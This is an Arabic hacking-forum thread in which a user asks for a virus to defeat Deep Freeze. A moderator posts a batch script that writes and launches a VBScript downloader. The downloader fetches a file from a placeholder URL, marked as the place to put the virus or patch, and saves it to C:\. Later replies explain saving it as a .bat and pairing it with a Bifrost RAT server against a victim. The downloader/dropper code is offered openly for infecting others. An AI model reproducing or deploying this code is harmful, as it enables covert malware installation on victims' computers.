اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

اخوانى احتاج لفيرس معين

اخوانى احتاج لفيرس معين


النتائج 1 إلى 9 من 9

الموضوع: اخوانى احتاج لفيرس معين

  1. #1
    هكر مجتهد Array الصورة الرمزية Łї๑ή ๑ƒ Ģ๑Đ
    تاريخ التسجيل
    Mar 2011
    الدولة
    ỂgΫρT
    المشاركات
    233

    افتراضي اخوانى احتاج لفيرس معين



    السلام عليكم


    اخوانى لن اطيل عليكم
    كل ما اريده كود لضرب الديب فريز او فايرس جاهز لضرب الديب فريز

    وجزاكم الله كل خيرر



  2. #2
    :: مشرف قسم الباك تراك :: Array الصورة الرمزية يارب رحمتك
    تاريخ التسجيل
    May 2012
    الدولة
    روح العرب
    المشاركات
    1,147

    افتراضي رد: اخوانى احتاج لفيرس معين

    كود PHP:
    @echo off 
    set file
    ="ضع هنا كود الفيرس او الباتش" 
    set dlto="C:\" 
    ::---------------- 

    if exist %temp%\dl.vbs del /q %temp%\dl.vbs 
    echo HTTPDownload %file%,%dlto% >> %temp%

    \dl.vbs 
    echo Sub HTTPDownload( myURL, myPath ) >> %

    temp%\dl.vbs 
    echo Dim i, objFile, objFSO, objHTTP, strFile, 

    strMsg >> %temp%\dl.vbs 
    echo Const ForReading = 1, ForWriting = 2, 

    ForAppending = 8 >> %temp%\dl.vbs 
    echo Set objFSO = CreateObject( 

    "
    Scripting.FileSystemObject" ) >> %temp%\dl.vbs 
    echo If objFSO.FolderExists( myPath ) Then >> %

    temp%\dl.vbs 
    echo strFile = objFSO.BuildPath( myPath, Mid( 

    myURL, InStrRev( myURL, "
    /" ) + 1 ) ) >> %temp%

    \dl.vbs 
    echo ElseIf objFSO.FolderExists( Left( myPath, 

    InStrRev( myPath, "
    \" ) - 1 ) ) Then >> %temp%

    \dl.vbs 
    echo strFile = myPath >> %temp%\dl.vbs 

    echo Else >> %temp%\dl.vbs 
    echo Exit Sub >> %temp%\dl.vbs 
    echo End If >> %temp%\dl.vbs 
    echo Set objFile = objFSO.OpenTextFile( strFile, 

    ForWriting, True ) >> %temp%\dl.vbs 
    echo Set objHTTP = CreateObject( 

    "
    WinHttp.WinHttpRequest.5.1" ) >> %temp%\dl.vbs 
    echo objHTTP.Open "
    GET", myURL, False >> %

    temp%\dl.vbs 
    echo objHTTP.Send >> %temp%\dl.vbs 
    echo For i = 1 To LenB( objHTTP.ResponseBody ) 

    >> %temp%\dl.vbs 
    echo objFile.Write Chr( AscB( MidB( 

    objHTTP.ResponseBody, i, 1 ) ) ) >> %temp%

    \dl.vbs 
    echo Next >> %temp%\dl.vbs 
    echo objFile.Close( ) >> %temp%\dl.vbs 
    echo End Sub >> %temp%\dl.vbs 

    start %temp%\dl.vbs 
    مع العلم هذا الكود ليس من صنعى بل من صنع صديق لي

    بآلتوفيق


  3. #3
    هكر مجتهد Array الصورة الرمزية Łї๑ή ๑ƒ Ģ๑Đ
    تاريخ التسجيل
    Mar 2011
    الدولة
    ỂgΫρT
    المشاركات
    233

    افتراضي رد: اخوانى احتاج لفيرس معين

    جزاك الله خيرا اخى انت وصديقك ولاكن اخى كل الى اعلمه عن الفيروسات انى اخد الكود واضعه فى المفكرة تمام واحفظو بأمتداد bat تمام الحين انت كاتب فىاول الكود


    @echo off
    set file="ضع هنا كود الفيرس او الباتش"
    set dlto="C:\"

    ارجو الشرح

    - - - تم التحديث - - -

    جزاك الله خيرا اخى انت وصديقك ولاكن اخى كل الى اعلمه عن الفيروسات انى اخد الكود واضعه فى المفكرة تمام واحفظو بأمتداد bat تمام الحين انت كاتب فىاول الكود


    @echo off
    set file="ضع هنا كود الفيرس او الباتش"
    set dlto="C:\"

    ارجو الشرح



  4. #4
    هكر مجتهد Array الصورة الرمزية (dz-adil@x-HaCkEr)
    تاريخ التسجيل
    Aug 2012
    المشاركات
    426

    افتراضي رد: اخوانى احتاج لفيرس معين

    يعني اخي كل فايروس عنده كود خاص به يعني الي تم برمجته به
    انسخه و ضعه في المكان الي مكتوب عندك
    او اخي حمل فيروس جاهز من النت
    و شكرا

    - - - تم التحديث - - -

    يعني اخي كل فايروس عنده كود خاص به يعني الي تم برمجته به
    انسخه و ضعه في المكان الي مكتوب عندك
    او اخي حمل فيروس جاهز من النت
    و شكرا


  5. #5
    هكر مجتهد Array الصورة الرمزية Łї๑ή ๑ƒ Ģ๑Đ
    تاريخ التسجيل
    Mar 2011
    الدولة
    ỂgΫρT
    المشاركات
    233

    افتراضي رد: اخوانى احتاج لفيرس معين

    اخى héker لك منى كل الاحترام والتقدير
    اخى الكريم الكود اقدر اعمله لأكون سيرفر
    بس مش فاهم اول نقطه فى الكود
    محتاجه يفهمنى بس
    يقصد انى اعمل كدا فى المفكرة ولا فى ملفات الضحية....
    فقط

    - - - تم التحديث - - -

    اخى héker لك منى كل الاحترام والتقدير
    اخى الكريم الكود اقدر اعمله لأكون سيرفر
    بس مش فاهم اول نقطه فى الكود
    محتاجه يفهمنى بس
    يقصد انى اعمل كدا فى المفكرة ولا فى ملفات الضحية....
    فقط


  6. #6
    :: مشرف قسم الباك تراك :: Array الصورة الرمزية يارب رحمتك
    تاريخ التسجيل
    May 2012
    الدولة
    روح العرب
    المشاركات
    1,147

    افتراضي رد: اخوانى احتاج لفيرس معين

    هلا ياعزيزى قم بعمل ذلك فى المفكرة

    وبعد ذلك قم بنسخ كود البآتش

    ولا تسالنى كيف لانى ليس لدى اى خبرة فى اى برنامج اخترآق فانا منذ دخلت هذا المجال لا استعملهم



  7. #7
    هكر مجتهد Array الصورة الرمزية Łї๑ή ๑ƒ Ģ๑Đ
    تاريخ التسجيل
    Mar 2011
    الدولة
    ỂgΫρT
    المشاركات
    233

    افتراضي رد: اخوانى احتاج لفيرس معين

    اخى اى باتش باتش البيفروست ام باتش الفايرس ؟. ....

    - - - تم التحديث - - -

    اخى اى باتش باتش البيفروست ام باتش الفايرس ؟. ....


  8. #8
    هكر مجتهد Array الصورة الرمزية (dz-adil@x-HaCkEr)
    تاريخ التسجيل
    Aug 2012
    المشاركات
    426

    افتراضي رد: اخوانى احتاج لفيرس معين

    السلام عليكم
    اخي انت تريد صنع فيروس ما دخل السيرفر انسخ كود الفيروس و ضعه في المكان المخصص له في الكود بعد نسخ الكود في المفكرة
    و اعمل حفض
    و شكرا

    - - - تم التحديث - - -

    السلام عليكم
    اخي انت تريد صنع فيروس ما دخل السيرفر انسخ كود الفيروس و ضعه في المكان المخصص له في الكود بعد نسخ الكود في المفكرة
    و اعمل حفض
    و شكرا


  9. #9
    هكر مجتهد Array الصورة الرمزية Łї๑ή ๑ƒ Ģ๑Đ
    تاريخ التسجيل
    Mar 2011
    الدولة
    ỂgΫρT
    المشاركات
    233

    افتراضي رد: اخوانى احتاج لفيرس معين

    اخى هاكر ارجو التوضويح او الشرح
    انظر الان انا اخذت الكود ووضعته فى المفكرة واحفظها بأمتداد bat تمام لماذا تقول لى انسخ الكود واضعه فى المكان المخصص لهفى الكود هذا يعنى ان هناك كودين وليس كود واحد ارجو الشرح....

    التعديل الأخير تم بواسطة Łї๑ή ๑ƒ Ģ๑Đ ; 11-14-2012 الساعة 02:57 AM


المواضيع المتشابهه

  1. أستفسار من اخوانى
    بواسطة مصرى في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 1
    آخر مشاركة: 09-02-2012, 12:59 AM
  2. استفسار يا اخوانى ؟
    بواسطة No FeeL في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 5
    آخر مشاركة: 02-21-2012, 03:55 PM
  3. مشكلة في سحب بيانات جدول معين !!!
    بواسطة rachida في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 1
    آخر مشاركة: 04-08-2011, 10:59 PM
  4. كيفية اختراق شخص معين ( لكل المبتدئين)
    بواسطة An10 في المنتدى منتدى الإختراق العام
    مشاركات: 53
    آخر مشاركة: 02-10-2011, 03:00 PM
  5. اخوانى الاعزاء
    بواسطة skeleton في المنتدى قسم اختراق الأجهزة
    مشاركات: 3
    آخر مشاركة: 02-03-2010, 09:24 AM

وجد الزوار هذه الصفحة بالبحث عن:

لم يصل أحد إلى هذه الصفحة عن طريق محرك بحث، ذلك حتى الآن!

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •